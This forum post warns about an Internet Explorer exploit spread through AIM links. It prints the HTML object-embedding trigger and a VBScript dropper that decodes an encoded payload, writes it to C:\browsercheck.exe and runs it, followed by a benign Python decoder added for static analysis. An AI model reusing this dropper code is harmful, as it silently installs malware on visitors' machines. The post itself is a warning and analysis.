This is the newest IE exploit going around. There's a version of it going around on AIM where you will get an IM from a buddy that has the virus telling you to visit a website.
Simple FIX: DON'T RUN IE. It sucks and it's full of unpatched holes that can lead to problems like this. Some are more than 2 years old. Use Mozilla.
Here's the exploit
Code:
<div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" data="drunkchicks.php"></object>
]]>
</exploit>
</security>
</xml>
</div>
That passes you to drunkchicks.php, which opens up the exploit.
Here is a section of it
Code:
function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function
res "z", "ff"
res "y", "00"
For m = 0 To UBound(v)
it = it & v(m)
Next
tmp = Split(it, ",")
Set WshShell = CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("Process")
pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
pth = "C:\browsercheck.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(pth, True)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l-2))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
WshShell.run("""" & pth & """")
The payload is encoded. I don't know VB all that well, but it looks like simple ASCII encoding. If I get bored I'll see if I can decode it.
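Reading the loop in the posted script, each comma-separated token is two hex digits for a byte value, optionally followed by a hex repeat count, after "z" and "y" are expanded to "ff" and "00". A decoder for static analysis follows as an added example that is not part of the original post; it only returns bytes in memory and never writes or runs them, and the sample chunks are constructed, not taken from the real payload.

```python
"""Static decoder for the hex/run-length array used by the posted script."""
import hashlib

# Shorthand expansions taken from the script's two res calls.
SUBSTITUTIONS = (("z", "ff"), ("y", "00"))


def decode_tokens(chunks):
    """Decode the string pieces of the v() array, copied out as text.

    Mirrors the script: expand shorthand, join, split on commas, then for
    each token emit byte Left(token, 2) repeated Mid(token, 3) times.
    """
    joined = "".join(chunks)
    for short, full in SUBSTITUTIONS:
        joined = joined.replace(short, full)

    out = bytearray()
    for position, token in enumerate(joined.split(",")):
        token = token.strip()
        if not token:
            raise ValueError(f"empty token at position {position}")
        byte = int(token[:2], 16)
        # Anything after the first two digits is a hex repeat count.
        count = int(token[2:], 16) if len(token) > 2 else 1
        out.extend(bytes([byte]) * count)
    return bytes(out)


def looks_like_pe(data):
    """True if the decoded bytes start with the DOS/PE 'MZ' magic."""
    return data[:2] == b"MZ"


# Constructed sample, split across two chunks the way v() is.
SAMPLE_CHUNKS = ["4d,5a,y3,", "z2,41"]

if __name__ == "__main__":
    decoded = decode_tokens(SAMPLE_CHUNKS)
    print("length :", len(decoded))
    print("is PE  :", looks_like_pe(decoded))
    # Hash the decoded bytes so they can be looked up without saving a file.
    print("sha256 :", hashlib.sha256(decoded).hexdigest())
```
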